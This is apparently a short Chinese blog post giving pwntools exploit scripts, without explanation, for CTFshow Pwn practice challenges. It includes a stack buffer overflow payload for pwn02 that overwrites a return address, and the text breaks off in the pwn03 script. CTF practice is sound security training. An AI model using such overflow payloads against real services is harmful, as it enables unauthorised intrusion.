CTFshow——Pwn(1)
CTFshow——Pwn(1)
有点懒不想写write up了。只有exploit。
PWN签到题
from pwn import *
p = remote('xxx',xxx)
p.interactive()
pwn02
from pwn import *
p =remote("pwn.chall.ctf.show",28006)
p.sendline('a'*(0x9+4) + p32(0x0804850F))
p.interactive()
pwn03
from pwn import *
from
原创
2021-02-24 22:13:37 ·
479 阅读 ·
0 评论